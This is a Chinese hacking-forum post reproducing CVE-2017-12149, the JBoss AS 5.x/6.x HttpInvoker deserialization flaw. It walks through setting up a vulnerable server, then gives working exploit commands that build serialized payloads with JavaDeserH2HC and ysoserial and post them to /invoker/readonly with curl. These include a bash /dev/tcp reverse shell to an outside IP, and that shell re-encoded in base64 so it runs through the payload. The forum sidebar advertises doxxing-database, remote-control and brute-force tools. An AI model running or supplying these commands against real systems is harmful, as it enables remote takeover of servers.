HACK80

我们很年轻,但我们有信念、有梦想!

我们坚信只有今天付出了,才有机会看到明天的太阳!
现在!加入我们,给你一个气氛优秀的技术圈子

作者: EvilGod
查看: 416|回复: 0

more +随机图赏Gallery

社工库查询工具1.1修改版社工库查询工具1.1修改版
可以手机远程控制电脑,手机远程控制手机的超强工具!可以手机远程控制电脑,手机远程控制手机的超强工具!
简单---两步--进暗网--更新之前的简单---两步--进暗网--更新之前的
2017年中旬WEB渗透系列课程-00前言2017年中旬WEB渗透系列课程-00前言
2017年中旬WEB渗透系列课程-25基于php参数开关的提权2017年中旬WEB渗透系列课程-25基于php参数开关的提权
2017年中旬WEB渗透系列课程-27HASH提权2017年中旬WEB渗透系列课程-27HASH提权
御剑后台扫描--自带10多兆后台数据库御剑后台扫描--自带10多兆后台数据库
国内高手浅蓝渗透视频,值得一看。国内高手浅蓝渗透视频,值得一看。
【重要公告】2017年中工作进展及最新课程发布【重要公告】2017年中工作进展及最新课程发布
二期公开课第6节-Linux下的爆破工具+爆破指定IP远程登陆二期公开课第6节-Linux下的爆破工具+爆破指定IP远程登陆

CVE-2017-12149漏洞复现

[复制链接]
EvilGod 发表于 2018-1-8 17:03:41 | 显示全部楼层 |阅读模式
查看: 416|回复: 0

马上注册,加入HACK80!与我们一起交流。

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
作者:znn
原文地址:https://secvul.com/topics/948.html

0x00 漏洞简介漏洞编号:
CVE-2017-12149
漏洞名称:
Jboss AS 5.x/6.x 反序列化漏洞
漏洞描述:
JBoss的HttpInvoker组件中的 ReadOnlyAccessFilter 过滤器中,其doFilter方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据流进行反序列化,导致任意代码执行。
影响版本:
Jboss AS 5.x
Jboss AS 6.x
0x01 环境搭建下载地址:
  1. http://download.jboss.org/jbossas/6.1/jboss-as-distribution-6.1.0.Final.zip
复制代码
当然也可以是其他存在漏洞的版本(http://jbossas.jboss.org/downloads/
然后:
  1. cd jboss-xx/bin
  2. run.sh -b 0.0.0.0
复制代码

这样Jboss就在0.0.0.0的8080端口跑起来了,当然java环境要提前准备好,这点无须多言。
0x02 漏洞复现以下分别用两个Java反序列化工具进行测试
2.1、JavaDeserH2HC
  1. https://github.com/joaomatosf/JavaDeserH2HC
复制代码
如下测试反弹:
  1. #Compiling
  2. javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
  3. #Saving serialized object in ExampleCommonsCollections1.ser
  4. java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap ip:port
  5. #Exploiting vulnerable server:
  6. curl http://192.168.1.106:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser
复制代码
(注:用该工具测试直接执行命令一直失败,但nc返台的payload执行并没有问题,可能是工具本身问题,也可能是因为我太菜。)
2.2、ysoserial
  1. https://github.com/frohoff/ysoserial
复制代码
首先进行编译
  1. mvn clean package -DskipTests
复制代码
生成payload并发送
  1. java -jar target/ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections5 "touch /tmp/123.txt" > tmp.ser
  2. curl http://192.168.1.106:8080/invoker/readonly --data-binary @tmp.ser
复制代码
这里有个坑就是要执行反弹的时候,比如,
  1. bash -i >& /dev/tcp/192.169.1.104/88 0>&1
复制代码
要转成
  1. bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY5LjEuMTA0Lzg4IDA+JjE=}|{base64,-d}|{bash,-i}
复制代码
这种base64的形式,不然一直出错。
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|小黑屋|手机版|HACK80 ( 沪ICP备15007512号 )

GMT+8, 2018-1-24 13:44 , Processed in 0.059328 second(s), 24 queries .

Powered by Discuz! X3.4 © 2001-2013 Comsenz Inc.